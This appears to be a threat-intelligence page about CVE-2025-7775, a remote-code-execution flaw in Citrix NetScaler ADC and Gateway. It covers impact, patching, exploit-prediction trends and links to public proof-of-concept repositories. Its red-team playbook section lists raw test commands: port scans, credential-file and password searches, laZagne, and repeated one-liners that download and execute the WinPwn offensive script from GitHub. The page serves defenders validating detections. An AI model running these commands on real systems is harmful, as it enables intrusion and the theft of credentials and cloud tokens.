CVE-2025-7775
Overview
This vulnerability is a memory overflow flaw classified under CWE-119, affecting the NetScaler ADC and NetScaler Gateway components. It arises from improper handling of memory buffers in specific virtual server configurations, including Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy), AAA virtual servers, and load balancing (LB) virtual servers bound with IPv6 services or service groups. The root cause is a buffer overflow condition triggered by malformed network traffic targeting these configured virtual servers, leading to memory corruption in the affected software modules.
Vulnerability Description
Memory overflow vulnerability leading to Remote Code Execution and/or Denial of Service in NetScaler ADC and NetScaler Gateway when NetScaler is configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server (OR) NetScaler ADC and NetScaler Gateway 13.1, 14.1, 13.1-FIPS and NDcPP: LB virtual servers of type (HTTP, SSL or HTTP_QUIC) bound with IPv6 services or servicegroups bound with IPv6 servers (OR) NetScaler ADC and NetScaler Gateway 13.1, 14.1, 13.1-FIPS and NDcPP: LB virtual servers of type (HTTP, SSL or HTTP_QUIC) bound with DBS IPv6 services or servicegroups bound with IPv6 DBS servers (OR) CR virtual server with type HDX
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary code remotely or cause a denial of service on affected NetScaler ADC or Gateway instances. Successful exploitation enables full system compromise, allowing attackers to execute commands with system-level privileges or disrupt service availability. Exploitation requires the device to be configured with specific virtual server types and IPv6 bindings, limiting exposure to certain deployment scenarios. The business impact includes potential data breaches, loss of service continuity, and lateral movement within the network environment.
Solution
Citrix has released patches addressing this vulnerability for NetScaler ADC and NetScaler Gateway versions 13.1, 14.1, 13.1-FIPS, and NDcPP. Administrators should apply the updates as detailed in Citrix Knowledge Center article CTX694938. The advisory provides specific instructions for upgrading affected virtual server configurations to fixed versions. No alternative workarounds are recommended; prompt patching is the primary mitigation strategy.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical memory overflow vulnerability has been identified in specific configurations of NetScaler ADC and NetScaler Gateway, particularly when these products are utilized as VPN virtual servers, AAA virtual servers, or when bound with IPv6 services. This flaw allows for remote code execution or denial of service, posing a significant threat to organizations that rely on these systems for application delivery and secure remote access. The vulnerability arises from improper handling of memory, which can be exploited by an attacker to manipulate the execution flow of the application, leading to unauthorized actions and potential system compromise.
Attack vectors for this vulnerability are particularly concerning due to the nature of the affected products. An attacker could exploit this flaw by sending specially crafted requests to the vulnerable NetScaler configurations. For instance, when the device is set up to handle HTTP, SSL, or HTTP_QUIC traffic bound with IPv6 services, an attacker could leverage this configuration to trigger the memory overflow. Additionally, scenarios involving the use of DBS IPv6 services or service groups further increase the attack surface. The ability to execute arbitrary code remotely means that an attacker could gain full control over the affected system, leading to data breaches, service disruptions, or further infiltration into the organization’s network.
The real-world impact of this vulnerability is profound. Organizations utilizing NetScaler for critical functions such as application delivery or remote access could face significant business risks if exploited. The potential for remote code execution means that sensitive data could be accessed or manipulated, leading to compliance violations and reputational damage. Furthermore, a denial of service could disrupt business operations, resulting in financial losses and diminished customer trust. The high CVSS score of 9.8 underscores the severity of this threat, indicating that organizations must prioritize remediation efforts to protect their infrastructure.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected systems is crucial, as vendors typically release security updates to address known vulnerabilities. Network monitoring tools should be employed to detect unusual traffic patterns that may indicate an attempted exploitation of the vulnerability. Additionally, organizations should consider implementing strict access controls and segmentation to limit exposure to vulnerable configurations. Conducting thorough security assessments and penetration testing can also help identify potential weaknesses in the environment, allowing for proactive measures to be taken before an attacker can exploit the vulnerability.
In conclusion, the memory overflow vulnerability in NetScaler ADC and Gateway presents a serious risk to organizations leveraging these products for secure application delivery and remote access. The potential for remote code execution and denial of service highlights the need for immediate attention and action. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against this threat. Implementing robust detection and mitigation strategies will be essential in safeguarding their systems and maintaining the integrity of their operations.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-7775, rising nearly 50% over recent measurements. This upward trend, accompanied by a consistent week-over-week increase, signals growing confidence among threat actors in the exploitability of this critical memory overflow vulnerability affecting NetScaler ADC and Gateway products. While no confirmed ransomware group usage has been reported, the rapid inclusion of this CVE in the Known Exploited Vulnerabilities (KEV) catalog underscores its elevated priority within the threat landscape. Concurrently, several new proof-of-concept exploits and detection tools have surfaced on public repositories, lowering the barrier for adversaries to weaponize this flaw. For defenders, this evolution heightens the urgency to monitor for exploitation attempts and reinforces the criticality of timely patching and detection capabilities. The increased EPSS score and expanding exploit toolkit collectively elevate the threat level, indicating a transition from theoretical risk to active exploitation potential.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
swabird/CVE-2025-7775-PoC
|
swabird | 4 | 2 | 2025-08-28 | View |
|
rxerium/CVE-2025-7775
Detection for CVE-2025-7775
|
rxerium | 2 | 0 | 2025-08-31 | View |
|
mr-r3b00t/CVE-2025-7775
Version detection PowerShell
|
mr-r3b00t | 1 | 1 | 2025-09-02 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
Aaqilyousuf/CVE-2025-7775-vulnerable-lab
|
Aaqilyousuf | 0 | 0 | 2025-08-30 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-7775 |
| support.citrix.com |
GitHub CVE
|
https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694938 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-7775 |